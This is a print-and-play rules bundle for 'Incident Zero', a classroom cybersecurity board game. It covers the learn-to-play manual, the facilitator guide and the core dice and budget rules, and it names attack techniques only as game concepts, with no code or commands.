INCIDENT ZERO

Complete Game (All 6 Modules) — Print & Play Bundle · v2.2 Playtest Edition

A cybersecurity board game by RetroVerse Studios · CC BY-NC-SA 4.0

Print this file (Ctrl/Cmd+P) or read on screen. Card pages print best on cardstock.

Contents:
  1. docs/HOW_TO_PLAY.md
  2. docs/TO_GUIDE.md
  3. docs/rules/core-rules.md
  4. docs/FRAMEWORK.md
  5. docs/module-combinations.md
  6. docs/VARIABLE_GAME_LENGTH_SYSTEM.md
  7. docs/rules/module-network-building.md
  8. docs/standalone-games/network-building.md
  9. cards/network-building/core-deck/server-cards.md
  10. cards/network-building/core-deck/security-device-cards.md
  11. cards/network-building/core-deck/architecture-cards.md
  12. cards/network-building/core-deck/asset-cards.md
  13. cards/network-building/standalone/business-requirement-cards.md
  14. cards/network-building/standalone/operational-event-cards.md
  15. cards/network-building/expansion-deck/legacy-systems.md
  16. cards/network-building/expansion-deck/cloud-variants.md
  17. docs/rules/module-hardening.md
  18. docs/standalone-games/hardening.md
  19. cards/hardening/core-deck/defense-cards.md
  20. cards/hardening/core-deck/pentester-tactic-cards.md
  21. cards/hardening/expansion-deck/advanced-tactics.md
  22. docs/rules/module-incident-response.md
  23. docs/standalone-games/incident-response.md
  24. cards/incident-response/core-deck/threat-defense-cards.md
  25. cards/incident-response/expansion-deck/advanced-threats.md
  26. cards/incident-response/expansion-deck/advanced-defenses.md
  27. docs/rules/module-disaster-recovery.md
  28. docs/standalone-games/disaster-recovery.md
  29. cards/disaster-recovery/core-deck/crisis-action-cards.md
  30. cards/disaster-recovery/core-deck/event-cards.md
  31. cards/disaster-recovery/core-deck/stakeholder-cards.md
  32. cards/disaster-recovery/expansion-deck/advanced-scenarios.md
  33. docs/rules/module-forensics.md
  34. docs/standalone-games/forensics.md
  35. cards/forensics/core-deck/investigation-cards.md
  36. cards/forensics/core-deck/evidence-cards.md
  37. docs/rules/module-audit-compliance.md
  38. docs/standalone-games/audit-compliance.md
  39. cards/audit-compliance/core-deck/audit-domain-cards.md
  40. cards/audit-compliance/expansion-deck/compliance-frameworks.md
  41. cards/print-templates/tracker-sheets.md
  42. cards/CARD_REFERENCE.md

docs/HOW_TO_PLAY.md

How to Play Incident Zero

Version: 2.2 - Playtest Edition Read time: ~15 minutes. First game: ~45 minutes.

This is the learn-to-play manual — read it once, run your first game, then use the module rules as reference during play. Exact tables and numbers live in the reference docs; this manual teaches the flow.


1. What Is This Game?

Incident Zero is a cybersecurity board game for classrooms and training rooms. One player is the Threat Orchestrator (TO) — part facilitator, part adversary, part narrator. Everyone else is the Blue Team: security defenders making decisions under budget and time pressure.

The game's signature rule: you get better dice odds by explaining your reasoning like a real analyst. Say "we investigate suspicious activity" and you roll flat. Say "we pull the mail gateway logs to check the sender's real IP against threat intel" and you roll at +3. Talking like a professional is literally how you win — that's the point.

There are 6 modules covering the security lifecycle. Each is a standalone 30-45 minute game; they also chain together (the outcome of one feeds the setup of the next). This manual teaches Incident Response first — it's the flagship and the best hook.

2. What You Need

3. The Core Loop (all modules)

Every module runs on the same engine:

  1. Turns. A fixed number of turns (announced at setup). Each turn: start-of-turn penalties → 2-3 minutes of team discussion → ONE team action → end of turn.
  2. Budget. One shared pool representing money, staff, and time. Every action costs Budget. Run dry and you can't act.
  3. The d20 roll. Uncertain actions need roll + modifiers ≥ 11.
  4. Justification modifiers. +2 for strong technical reasoning (methodology — why this approach works), +1 for naming real tools or techniques (Wireshark, EDR, Mimikatz, a MITRE technique). The TO judges honestly; vague = +0.
  5. Debrief. Every session ends with 5-10 minutes of "what happened, why, what would you do differently." This is where the learning locks in — don't skip it.

4. Your First Game: Incident Response (Beginner)

The setup (TO does this privately, 5 min): An attacker is inside the fictional company's network. The TO secretly builds a 3-card attack chain in kill-chain order and keeps it face-down:

Suggested first chain: T-01 Phishing Campaign (INITIAL COMPROMISE / SOCIAL ENGINEERING) → T-04 Lateral Movement via SMB (PIVOT & ESCALATE / NETWORK) → T-07 Scheduled Task Persistence (PERSISTENCE / MALWARE)

The three actions (Blue Team picks ONE per turn):

Action Cost On success (roll+mods ≥ 11)
Investigate 5 1st success on a link = the TO gives a clue. 2nd success on the same link = card revealed!
Deploy Defense 10/15/25 by tier If the card's vector AND chain step match the hidden card = revealed immediately. Partial match = defense stays on the table and gives +2 to future rolls against any link matching its vector
Emergency Response 15 No roll. Contain one already-revealed threat (removes its ongoing penalty)

The pressure (TO applies at the START of each turn): - Active Breach Cost: -5 Budget while any chain card is still unrevealed (the breach is burning money whether you see it or not) - Uncontained Threats: -5 Budget per revealed-but-uncontained threat (revealing the next card in the chain auto-contains the previous one)

When a card is revealed, the team immediately picks ONE reward: draw 2 Defense cards, +10 Budget, or Fast-Track (next Investigate succeeds on 5+).

Scripted opening — read this at the table

TURN 1. TO: "Start of turn: one attacker action is still hidden — Active Breach Cost, minus 5. Budget: 95. Something is wrong at Meridian Logistics: the helpdesk queue is full of password-reset complaints. What do you do?" Team (after discussion): "Investigate. We pull the mail gateway logs and check sender domains against our threat-intel feed — if this is phishing, the return-path won't match the display name." TO: "That's a real methodology and a real tool — +2 and +1. Roll." Rolls 9. 9+3 = 12 ≥ 11 — success. TO reads a clue from T-01: "Several employees received emails claiming to be from IT, asking them to 're-authenticate'. The link goes to a look-alike domain registered 4 days ago." (First success on this link — clue only. Budget: 95 - 5 = 90.)

TURN 2. TO: "Active Breach Cost, minus 5. Budget: 85." Team: "Keep digging on the phishing — we check the mail gateway for who clicked, and pull those workstations' proxy logs." TO: "+2, +1. Roll." Rolls 10. 13 ≥ 11 — second success on the same link. TO flips T-01 face-up: "Phishing Campaign — revealed! Three users entered credentials on the fake page. This threat is now uncontained. Choose a reward." Team takes Budget Grant: 85 - 5 + 10 = 90.

TURN 3. TO: "Two cards still hidden: Active Breach minus 5. One uncontained threat: minus 5. Budget: 80. You know how they got in — you don't yet know where they went." From here, you're on your own. (A strong play: Deploy the Network Segmentation defense — if the next hidden card is network lateral movement, vector + step match reveals it instantly and auto-contains the phishing.)

How it ends

Debrief prompts: What did you spend the most on, and was it worth it? Which clue actually changed your next decision? What one defense, bought before turn 1, would have changed everything?

5. The Other Five Modules (one paragraph each)

Chaining modules: outcomes carry forward (audit gaps raise your DR costs; an IR loss sets up DR; IR's revealed chain seeds Forensics). See Module Combinations. Full lifecycle = all six in sequence, 4-5 hours across sessions.

6. Where to Go Next

You want... Read
You're the Threat Orchestrator The TO Guide — the role, judging justifications, per-module screens
Exact rules for a module docs/rules/ — core + one file per module
Solo/standalone setup for any module docs/standalone-games/
Every card, indexed cards/CARD_REFERENCE.md
To run a playtest and report back docs/playtesting/
Variable game length & difficulty tiers core-rules §3a

7. Quick Reference (photocopy this)

Roll: d20 + modifiers ≥ 11 · +2 strong justification · +1 real tool/technique named · +2 matching deployed defense (IR) IR costs: Investigate 5 · Deploy 10/15/25 · Emergency Response 15 IR start-of-turn: -5 while any card hidden · -5 per uncontained revealed threat Reveal: 2 successful Investigates on a link, or 1 full-match Deploy (vector + step) · always the earliest unrevealed card Reward per reveal (pick 1): 2 Defense cards / +10 Budget / next Investigate succeeds on 5+ Turn limit: (chain cards × 2) + 1 → 3 cards = 7 turns Budgets: NB 40-60 · DR 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150

docs/TO_GUIDE.md

The Threat Orchestrator's Guide

Version: 2.2 - Playtest Edition Audience: anyone about to run Incident Zero — teacher, trainer, or the friend who volunteered.


1. The Role

The Threat Orchestrator (TO) is Incident Zero's dungeon master. You wear three hats, usually in the same minute:

If you've ever run a tabletop RPG, you already have 80% of this. The remaining 20% is the adjudication rubric in §4 — it's the part that makes this game educational rather than just thematic.

A good TO makes the game. The same scenario is flat or unforgettable depending on how you deliver clues and how honestly you judge reasoning. That's why this guide exists.

2. Golden Rules

  1. Be fair, not nice. Never fudge dice — in either direction. The rules already give you legitimate difficulty dials (§5); use those, not your thumb on the d20.
  2. Never block on ignorance. If players are stuck, sell them a hint through the fiction ("your SOC junior suggests looking at outbound traffic...") rather than letting three turns die in silence.
  3. Announce costs before actions. "That's 15 Budget — confirm?" prevents every argument you'd otherwise have.
  4. Explain outcomes. Success or failure, say why in security terms. The explanation is the lesson; the roll is just pacing.
  5. Keep the clock. 2-3 minutes of planning per turn, firmly. Deliberation past that point is quarterbacking, not strategy.
  6. Let them be wrong. A confidently wrong plan that fails teaches more than a corrected plan that succeeds. Save the correction for the debrief.

3. Session Prep (15 minutes)

4. Judging Justifications (the heart of the job)

The +2/+1 modifiers are the game's teaching engine. Your consistency is what makes them meaningful.

+2 — Strong technical justification. The player explains methodology: what they'll look at, and why that would reveal or stop this specific thing. - ✅ "We pull the mail gateway logs and compare the return-path against the display-name domain — spoofed senders won't match." (mechanism stated) - ✅ "Deploy EDR because living-off-the-land attacks won't trip signature AV — we need behavioral detection." (threat-to-control logic) - ❌ "We investigate the email server thoroughly." (a location is not a method)

+1 — Real tool or technique named. Wireshark, Splunk queries, Mimikatz, a MITRE technique ID, an actual CVE. - ✅ "Check LSASS access events — that's Mimikatz behavior, T1003." - ❌ "We use our security tools." (no it isn't)

Rulings that keep it fair: - Judge the reasoning, not the vocabulary. A beginner saying "check if the email really came from who it says" in plain words has the mechanism — award the +2. A buzzword salad without a mechanism gets +0. - Consistency beats generosity. Whatever bar you set on turn 1 is the bar all game. - Escalate the bar as the group learns — by session three, "we check the SIEM" that earned +1 in session one should need a specific query. Announce the escalation openly ("you're professionals now — I want specifics"). - Expert groups ("Expert Mode"): award +2 only for named artifacts, ATT&CK technique IDs, or detection logic. This is the challenge ceiling for practitioner tables — the card math never has to change. - One player monologuing every justification? Ask a different player to give it each turn ("Sam, you're on comms — why does this matter to the regulator?").

5. Difficulty Dials (live, legitimate)

Signs it's too easy: no failed rolls; goal in sight with 40+ Budget spare; players bored. Signs it's too hard: no progress for 3+ turns; consecutive failures; frustration replacing discussion.

Easier (pick 1-2) Harder (pick 1-2)
Richer clues (more specific detail per success) Vaguer clues (accurate but terse)
Suggest an angle through the fiction Expert-mode justification bar
Shorter chain / lower tier next game Longer chain, expansion cards
Beginner budgets (module max) Minimum budgets

Never adjust by fudging a roll or changing a printed number mid-game — players smell it, and it teaches that outcomes are arbitrary.

6. Failure Modes (yours, not theirs)

Failure Symptom Fix
The Encyclopedia You lecture after every roll One sentence of "why," save the rest for debrief
The Softie Everyone always gets +2 Re-read §4; require the mechanism
The Sphinx Clues so cryptic nobody moves Clues must be actionable: each should suggest at least one sensible next investigation
The Railroader You steer them to your solution Multiple paths are valid; score the outcome, not the route
The Accountant You narrate numbers, not events Lead with fiction, then state the numbers
The Rusher Debrief skipped because time ran out Protect the last 10 minutes like it's the win condition — it is

7. Module Panels (your screen, one per module)

🔎 Incident Response — you are the hidden attacker

🛡️ Hardening — you become the pentester mid-game

🏗️ Network Building — you are the demanding business

🚨 Disaster Recovery — you are the crisis itself

🔬 Forensics — you are the evidence

📋 Audit & Compliance — you are the organization under review

8. Running the Debrief (10 minutes, non-negotiable)

Three rounds, in order: What happened? (players narrate, you correct only facts) → Why did it work that way? (connect two or three key moments to real-world security — this is where you finally get to lecture, briefly) → What would you do differently? (go around the table; everyone answers). Losses debrief better than wins: read any unrevealed cards' "Why This Works" text aloud — it's the payoff for losing.

9. First Session? Do This

  1. Run beginner Incident Response with the scripted opening in How to Play §4 — your first two turns are literally written out
  2. Keep the tracker sheet visible to everyone; public state builds trust in your fairness
  3. Log frictions on the session notes form — your confusion is playtest data too
  4. Forgive yourself one rules mistake per session; announce it, fix it forward, don't replay

docs/rules/core-rules.md

Incident Zero: Core Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: October 2025


Core Concept 🎯

Incident Zero is a modular cybersecurity board game for 2+ players designed for educational environments. One player acts as the Threat Orchestrator (TO) (the facilitator), while all other players form Blue Teams (the Defenders).

How It Works

Players choose which module(s) to play based on learning objectives:

  1. Network Building Module - Design and secure infrastructure (30-45 min)
  2. Hardening Module - Build defense-in-depth (30-45 min)
  3. Incident Response Module - Detect and investigate hidden attack chains (30-45 min)
  4. Disaster Recovery Module - Manage breach crisis (30-45 min)
  5. Forensics Module - Investigate and attribute attacks (30-45 min) NEW in v2.1
  6. Audit & Compliance Module - Conduct security assessments (30-45 min)

Modules can be played solo or combined in any sequence using the modifier generation procedures documented in FRAMEWORK.md and Module Combinations.


Game Components (Universal)

Card Types

Threat Cards

Represent attacker actions. Each card includes: - Title: e.g., "Phishing Campaign" - Attack Chain Step: INITIAL COMPROMISE, PIVOT & ESCALATE, PERSISTENCE, or C2 & EXFIL - Attack Vector: SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL - Clue: Descriptive text for the Threat Orchestrator - Why This Works: Educational explanation (revealed after discovery)

Deck Composition: - 12 Base Threat Cards (see cards/incident-response/core-deck/threat-defense-cards.md) - 8 Expansion Threat Cards (see cards/incident-response/expansion-deck/advanced-threats.md)


Defense Cards

Represent security controls. Each card includes: - Title: e.g., "Multi-Factor Authentication" - Countermeasure Vector: One of the six attack vectors - Tier: BASIC (10 Budget), ADVANCED (15 Budget), or ELITE (25 Budget) - Description: What the defense does and when it applies

Deck Composition: - 24 Base Defense Cards (see cards/incident-response/core-deck/threat-defense-cards.md) - 19 Expansion Defenses (see cards/incident-response/expansion-deck/advanced-defenses.md)

Examples: - BASIC: Email Authentication Setup, User Security Training, Firewall Rules (10 Budget) - ADVANCED: Multi-Factor Authentication, EDR, Network Segmentation (15 Budget) - ELITE: Threat Hunting, Memory Forensics, Deception Technology (25 Budget)


Pentester Tactic Cards

Represent sophisticated attack techniques used in Hardening module (and potentially others).

8 Core Tactics (PT-01 to PT-08): 1. PT-01: Social Engineering - Pretexting Attack 2. PT-02: Malware Evasion - Living-off-the-Land Technique 3. PT-03: Credential Dumping - Mimikatz Attack 4. PT-04: Lateral Movement - Network Traversal 5. PT-05: Privilege Escalation - Unpatched Kernel Exploit 6. PT-06: Data Exfiltration - Unmonitored Channel 7. PT-07: Supply Chain Compromise - Trusted Software Update 8. PT-08: Insider Threat - Malicious Administrator

See cards/hardening/core-deck/pentester-tactic-cards.md for full card text, plus 8 expansion tactics (PT-09 to PT-16) in advanced-tactics.md.


Asset Cards

Simple cards providing scenario context. Examples: - Email Server - Customer Database - Domain Controller - Web Application - Backup System - Developer Workstation


Game Materials Required

Physical Components: - One 20-sided die (d20) - Turn Tracker (paper or board, counts 1-12+) - Budget Tracker (shows 0-150+) - Reputation/Security Score Tracker (shows 0-100) - Uncontained Threats Tracker (shows 0-5) - Tokens or counters (for tracking upgrades, penalties)

Optional: - Score sheets (printable or paper) - Playbook tracking sheet - Stakeholder communication log (for Disaster Recovery)


Universal Game Mechanics

1. The d20 Roll System

When Used: Investigation, Defense Deployment, Negotiation, and similar actions that have uncertain outcomes.

How It Works: 1. Player announces action and parameters 2. Player rolls 1d20 (one 20-sided die) 3. Compare result to target number (usually 11+) plus modifiers 4. Success if: roll + modifiers ≥ target number

Example:

Action: Investigate email headers
Target: 11+
Roll: 7
Modifiers: +2 (technical justification) +1 (referenced Splunk)
Calculation: 7 + 2 + 1 = 10
Result: FAIL (10 < 11)

2. Budget System (Universal)

What is Budget? Abstract resource representing time, money, personnel, and tools. Spent to take actions, buy defenses, or conduct investigations.

Budget Allocation by Module: - Network Building: Start at 40-60 (by difficulty; see module rules) - Hardening: Start at 150 (or carry over from IR) - Incident Response: Start at 100 - Disaster Recovery: Start at 50 (emergency fund) - Forensics: Start at 75 - Audit & Compliance: Start at 100 (used only for optional remediation cards)

Budget Spending: - Investigate action: 5 Budget - Deploy Defense: 10/15/25 Budget (by tier) - Emergency Response (IR): 15 Budget (v2.2; was 25) - Active Breach Cost (IR, v2.2): -5 Budget at start of each turn while any chain card remains unrevealed - Harden Upgrade (Hardening): 5 Budget - Create Playbook (Hardening): 10 Budget - Crisis Action cards (DR): 5-20 Budget per card (ACTION-01 to ACTION-12; the free "Holding Statement" costs 0) - Ransom Decision (DR, ACTION-13): Pay 20 / Negotiate 5 / Refuse 0

Budget = 0: Team loses (cannot take further actions)

Exception (Disaster Recovery, v2.2): Budget floor is 0 and the free Holding Statement action remains available — DR is never lost by running out of Budget; DR's loss condition is any stakeholder trust reaching 0%.


3. Turn System (Universal)

Turns represent: Time passing in the game world (6 hours, 30 minutes, or abstract unit depending on module)

Turn Sequence: 1. Start of Turn: Penalties applied, trackers announced 2. Planning Phase: Team discusses strategy (2-3 min) 3. Action Phase: Execute chosen action, resolve rolls 4. End of Turn: Advance tracker, draw card, check events


3a. Variable Game Length System (v2.1 - New!)

Philosophy: In real incident response, some attacks move fast (hours), some take months. Fixed turn lengths feel unrealistic. This system adds realism without requiring complex calculations.

For Beginners & Quick Play: Default Formula

Default Formula: (Attack Chain Cards × 2) + 1

This gives attackers enough time to progress realistically while keeping games manageable:

Attack Chain Formula Turn Count Session Duration
3 cards (3 × 2) + 1 7 turns 30-40 min play
4 cards (4 × 2) + 1 9 turns 35-45 min play
5 cards (5 × 2) + 1 11 turns 40-50 min play
6 cards (6 × 2) + 1 13 turns 45-55 min play

How to Use Default Formula: 1. Choose number of threat cards in attack chain (3, 4, 5, or 6) 2. Apply formula: (Cards × 2) + 1 = Turn Count 3. Announce turn count to Blue Team 4. Play game normally with that turn limit

Example Setup:

"I've created a 4-card attack chain. That's (4 × 2) + 1 = 9 turns. You have 9 turns to detect all four threats. Go!"


For Advanced Players: Complexity Tiers (v2.1)

Advanced Threat Orchestrators can use a Tier + d4 system for more control and variability:

Step 1: Select Attack Complexity Tier

Tier Turn Base Attack Profile Example
TIER 1 5-7 Simple & obvious Script kiddie using public tools
TIER 2 8-10 Standard sophistication Organized cybercriminal group
TIER 3 11-13 Highly sophisticated APT with operational security
TIER 4 14-16 Expert/Nation-state State-sponsored group

Step 2: Add Randomness (Optional)

Roll 1d4 for variation: - Roll 1: -1 turn (tight timeline) - Roll 2 or 3: ±0 turns (no change) - Roll 4: +1 turn (extended dwell time)

Final Turn Count = Tier Base + d4 Result

Example Advanced Setup:

"This is a TIER 2 attack (organized cybercriminals). Base is 8-10 turns. I'll roll d4 for variation... [rolls 4, +1 turn]. Final turn count: 9-11 turns."


Critical Game Integrity Rules (v2.1)

These rules protect game balance and prevent metagaming:

Rule 1: Accept Any Roll (Even If It Feels Wrong)

The Rule: Threat Orchestrators MUST accept the random result, even if it feels impossibly tight or loose.

Why: Real incident response is unpredictable. Sometimes attacks happen faster or slower than expected.

Example Scenarios: - TIER 3 attack (11-13 base) + d4 roll of 1 = 10-12 turns (tighter than expected, but realistic) - TIER 1 attack (5-7 base) + d4 roll of 4 = 6-8 turns (easier conditions, but acceptable)

When Chaos Feels Realistic: - Tight timeline: "The attacker worked faster than expected—they had prior knowledge" - Loose timeline: "The attacker was cautious, spending weeks in reconnaissance before striking"

Implementation: Lean into the randomness as realistic incident variability.


Rule 2: Players Cannot Question Tier Based on Turn Count

The Rule: Blue Team CANNOT deduce the attack tier from the announced turn count. They cannot ask "Is this TIER 2?" or "Is this TIER 4?" based on how many turns they have.

Why: Real incident response doesn't come with difficulty labels. Attackers don't advertise sophistication. Players should discover complexity through gameplay (attack chain complexity, defender evasion, tool sophistication, etc.).

What Players CAN Ask: - "What are the suspicious network events?" (leads to understanding threats) - "Can we analyze the malware?" (reveals attacker sophistication through findings) - "Why did this attack succeed?" (post-game discussion)

What Players CANNOT Ask: - "Is this a TIER 2 attack?" (deriving tier from turn count) - "This looks like a TIER 1 because we have 7 turns" (meta-gaming difficulty)

Implementation: Respond to difficulty questions by saying "Investigate and find out!" Players discover sophistication through evidence, not from turn counts.


Rule 3: TO Modifier Authority (Rare & Optional)

The Rule: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment IF the rolled result feels genuinely unreasonable for the scenario.

When to Use (Rare): - Scenario setup is unusually complex (multiple attack vectors, coordination across systems) - Player group is new and needs slightly easier conditions - Real-world incident being taught had specific timeline constraints

When NOT to Use (Prefer Random): - "The roll feels unlucky" (accept the chaos) - "I want this exactly 10 turns" (let dice decide) - "The attack chain is long so it should take longer" (that's what TIER system handles)

Implementation: 1. Roll d4 normally 2. Announce rolled result 3. ONLY IF genuinely unreasonable, apply ±1 modifier and explain why 4. Document the override for consistency in future scenarios

Example Valid Use:

"TIER 2 base 8-10, rolled -1 = 7-9 turns. That's tight given we have 5-card attack chain, so I'm adding +1 modifier (explaining the discovery is methodical). Final: 8-10 turns."

Example Invalid Use:

"I rolled 8-10 but I want 10-12, so I'm adding +2." (NO - use the roll as-is)


Implementation Checklist

For Beginners (Use Default Formula): - [ ] Choose attack chain length (3, 4, 5, or 6 cards) - [ ] Calculate: (Cards × 2) + 1 - [ ] Announce turn count - [ ] Play

For Advanced (Use Tier + d4): - [ ] Select TIER (1, 2, 3, or 4) - [ ] Announce TIER basis (not the number, just why it's that complexity) - [ ] Roll d4 for variation (hidden or public, your choice) - [ ] Calculate final turn count - [ ] Apply Rule 3 modifier if genuinely needed (rare) - [ ] Announce final turn count WITHOUT revealing tier


Quick Reference Card

Default Formula: Turn Count = (Attack Cards × 2) + 1

Tier System: - TIER 1: 5-7 turns (simple) - TIER 2: 8-10 turns (standard) - TIER 3: 11-13 turns (advanced) - TIER 4: 14-16 turns (expert) - Add d4 roll: -1, 0, 0, or +1

Golden Rules: 1. Accept any roll (embrace chaos) 2. Never reveal tier to players 3. Modifier authority only when truly needed (rare)


4. Roll Modifiers (Universal)

All modules use the same modifier system for consistency:

+2 Bonus: Strong Technical Justification

Awarded when a player provides clear, specific reasoning for their action using real security concepts.

Examples: - "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds" - "We're deploying EDR on all endpoints because it can detect living-off-the-land techniques" - "We're querying our SIEM for scheduled task creation events because attackers use them for persistence"

Criteria: - References specific tools (Splunk, EDR, SIEM, etc.) - Explains methodology (why this approach works) - Shows understanding of the threat being addressed


+1 Bonus: Real Tools or Techniques Referenced

Awarded when player references actual security tools or real attack/defense techniques.

Examples: - "We'll use Wireshark to analyze the network traffic" - "We're checking for Mimikatz usage in memory" - "We're reviewing EDR telemetry" - "We're looking for this specific CVE exploitation pattern"

Criteria: - References real tools (Wireshark, EDR, Splunk, etc.) - References real techniques (MITRE ATT&CK, specific CVEs) - Shows awareness of how things actually work


5. Uncontained Threats Penalty (Incident Response Module)

When Applied: Incident Response module only, applied at START of each turn

How It Works: 1. When a threat card is revealed, add 1 to Uncontained Threats Tracker 2. At START of each turn, deduct 5 Budget per uncontained threat 3. When next card in chain is revealed, previous threat is auto-mitigated (-1 from tracker) 4. When Emergency Response action is used (15 Budget), remove a revealed threat (-1 from tracker)

Companion rule — Active Breach Cost (v2.2): while at least one chain card remains unrevealed, deduct an additional flat -5 Budget at the start of each turn. Hidden attackers cost money too.

Purpose: Creates urgency - dwell time costs money, whether you've found the attacker yet or not. Teaches real-world incident response costs.

Example (uncontained penalty only; Active Breach Cost also applies while cards remain hidden):

Turn 1: Phishing revealed → Uncontained Threats = 1
Turn 2: START → Deduct 5 Budget (95 remaining from 100)
Turn 3: Lateral Movement revealed → Phishing auto-mitigated (Uncontained = 1)
Turn 3: START → Deduct 5 Budget
Turn 4: Emergency Response on Lateral Movement (15 Budget) → Uncontained Threats = 0

Common Roles & Responsibilities

Threat Orchestrator (Facilitator)

Responsibilities: - Manage game state and track turns/budget - Describe scenarios and outcomes - Roll dice when action outcomes are uncertain - Guide the narrative

During Incident Response: - Create and manage hidden attack chain - Provide clues based on successful investigations - Control Uncontained Threats penalties - Be fair but challenging

During Other Modules: - Describe threat context and defenses - Draw Pentester Tactic cards (Hardening) - Manage timeline and deadlines (Disaster Recovery) - Guide debrief questions

Universal Tips: - Explain why actions succeed or fail - Ask clarifying questions about player strategy - Balance challenge with learning - Provide constructive feedback


Blue Team (Defenders)

Responsibilities: - Discuss strategy as a team - Choose one action per turn - Justify your decisions (gain +2 modifier) - Manage budget carefully - Learn from success and failure


Modifier Stacking Rules

Key Rule: Modifiers are additive and can stack.

Example (Hardening Module, canonical formula — v2.2):

Pentester Tactic: PT-02 Living-off-the-Land (DC 13)

Defense roll = d20
  + printed bonus for the ONE defense chosen (D-08 EDR vs PT-02: +3)
  + hardening upgrades on that defense (+2 each; one upgrade: +2)
  + relevant playbook (+3)

Team rolls 8:
8 + 3 (EDR) + 2 (upgrade) + 3 (playbook) = 16 ≥ 13 = SUCCESS

Only the single chosen defense's printed bonus applies — deployed defenses do not stack with each other against one tactic.


Difficulty & Scaling

By Attack Chain Length

Length Difficulty Best For
3 cards Beginner Learning mechanics, 30 min sessions
4 cards Intermediate Standard play, 40 min sessions
5 cards Advanced Challenge play, full kill chain

By Starting Budget

Budget Difficulty Best For
60 Hard Resource scarcity, tough choices
100 Standard Balanced play, most scenarios
150+ Easy Strategic depth, multiple options

By Turn Limit

Turns Difficulty Best For
8 Hard Time pressure, fast play
10 Standard Balanced, most scenarios
12 Easy Exploration, learning

Note (v2.2): Incident Response derives its turn limit from the Variable Game Length formula — (Attack Chain Cards × 2) + 1 → 7/9/11 turns (see §3a). The table above is for modules with educator-set limits.


Educational Objectives

By Module

Module Primary Learning Secondary Learning
Incident Response Cyber kill chain, attack detection, investigation Resource prioritization, incident response
Hardening Defense-in-depth, layering, proactive security Cost-benefit analysis, security architecture
Disaster Recovery Crisis management, stakeholder communication Risk assessment, incident cost
Network Building Network design, asset security, architecture Infrastructure hardening, threat modeling
Forensics Digital forensics, chain of custody, attribution Evidence handling, MITRE ATT&CK mapping
Audit & Compliance Security assessment, governance, compliance Risk identification, remediation prioritization

By Game Mechanic

Mechanic What It Teaches
d20 roll system Uncertainty, risk, informed decision-making
Budget constraints Resource allocation, prioritization
Justification bonuses Technical reasoning, tools/techniques knowledge
Uncontained Threats penalty Urgency, cost of dwell time
Pentester Tactics Attacker sophistication, defense limitations
Playbook system Preparation, incident response planning
Scoring systems Outcome measurement, quality assessment

Cooperative vs. Competitive Play

Cooperative Mode

Competitive Mode

Implementation: - Same setup for all teams - Teams cannot share information (Incident Response) - Score comparison determines winner (Hardening) - Reputation comparison (Disaster Recovery)


Debrief & Reflection (Universal)

Every module should include a 5-15 minute debrief with three sections:

Part 1: What Happened?

Part 2: Why Did That Happen?

Part 3: What Would You Do Differently?


Tips for Threat Orchestrators (Universal)

Before the Game

  1. Read the module rules completely - Know what's coming
  2. Prepare your scenario - Pre-build attack chain or threat context
  3. Organize materials - Sort cards, prepare trackers
  4. Know your balancing points - Be ready to adjust difficulty if needed
  5. Practice reading clues - Deliver them dramatically!

During Gameplay

  1. Be clear about costs - Announce Budget before action
  2. Resolve rolls immediately - Announce target, let player roll, resolve
  3. Ask clarifying questions - "Why are you investigating email headers?"
  4. Be fair but challenging - Give honest difficulty, don't fudge rolls
  5. Narrate outcomes - Describe what happens, not just success/failure
  6. Manage pacing - Keep turns moving (2-3 min discussion max)
  7. Track penalties accurately - Keep budget, turn, and threat trackers visible

Balancing Difficulty

Too Easy Signs: - Team reveals all cards/achieves goal with 40+ budget remaining - No failed rolls - No meaningful decisions required - Team is bored

Too Hard Signs: - Team is stuck/making no progress after 5 turns - Multiple consecutive failed rolls - Team frustrated rather than challenged - No learning happening

Adjustment Options: - Easier: Provide better clues, more starting budget, fewer tactics - Harder: Less specific clues, lower budget, more tactics - Faster: Shorter turn limits, simpler scenarios - Slower: More turns, more complex scenarios


Card Reference

For complete card descriptions, see: - Base Threat & Defense Cards cards/incident-response/core-deck/threat-defense-cards.md - Expansion Threats cards/incident-response/expansion-deck/advanced-threats.md - Expansion Defenses cards/incident-response/expansion-deck/advanced-defenses.md - All decks indexed cards/CARD_REFERENCE.md


Module-Specific Rules

For complete rules on each module:


Quick Reference: Universal Mechanics

d20 Roll System

Budget System

Turn System

Penalties & Bonuses


Continuing to Next Steps

For your first game: 1. Choose a module from Module Combinations 2. Read the module-specific rules 3. Read the standalone setup guide 4. Prepare your scenario 5. Play!

For multiple modules: 1. Refer to Module Combinations for recommended sequences 2. Refer to FRAMEWORK.md for modifier generation procedures 3. Play first module, generate modifiers for next 4. Continue as desired


Need Help?


Incident Zero: Core Rules & Mechanics v2.1 - Balanced & Refined Edition Universal rules for all modules

docs/FRAMEWORK.md

Incident Zero: Game Module Framework

Core Philosophy

Incident Zero is a modular, flexible educational game system. Rather than a rigid "phase" structure, we offer 6 interchangeable modules that educators can combine in any way that serves their learning objectives.


The 6 Core Modules

1. Incident Response Module

Duration: 30-45 minutes (solo), 20-35 minutes (in combination) Focus: Attack detection, investigation, incident response Best For: Teaching cyber kill chain, investigation methodology, budget prioritization

Standalone: Players detect a hidden attack chain through investigation and defense deployment In Combination: Outcome (win/lose) and discovered cards modify subsequent modules


2. Hardening Module

Duration: 30-45 minutes (solo), 20-30 minutes (in combination) Focus: Defense-in-depth, security architecture, proactive hardening Best For: Teaching layered security, strategic planning, cost-benefit analysis

Standalone: Players build comprehensive defenses against known threat vectors In Combination: Discovered threats (from Incident Response) guide defense strategy; OR defenses are generated via dice/cards


3. Disaster Recovery Module

Duration: 30-45 minutes (solo), 25-35 minutes (in combination) Focus: Crisis management, forensics, stakeholder communication Best For: Teaching incident response procedures, risk management, decision-making under pressure

Standalone: Players manage a breach crisis with budget constraints and reputation scoring In Combination: Breach scope determined by Incident Response outcome; OR generated at setup


4. Network Building Module

Duration: 30-45 minutes (solo), 15-25 minutes (in combination) Focus: Network architecture, asset security, foundational infrastructure Best For: Teaching network design, critical asset identification, infrastructure hardening

Standalone: Players design and secure a network from scratch In Combination: Network design becomes prerequisite for all other modules; OR used as rebuild scenario after Incident Response


5. Forensics Module (NEW in v2.1)

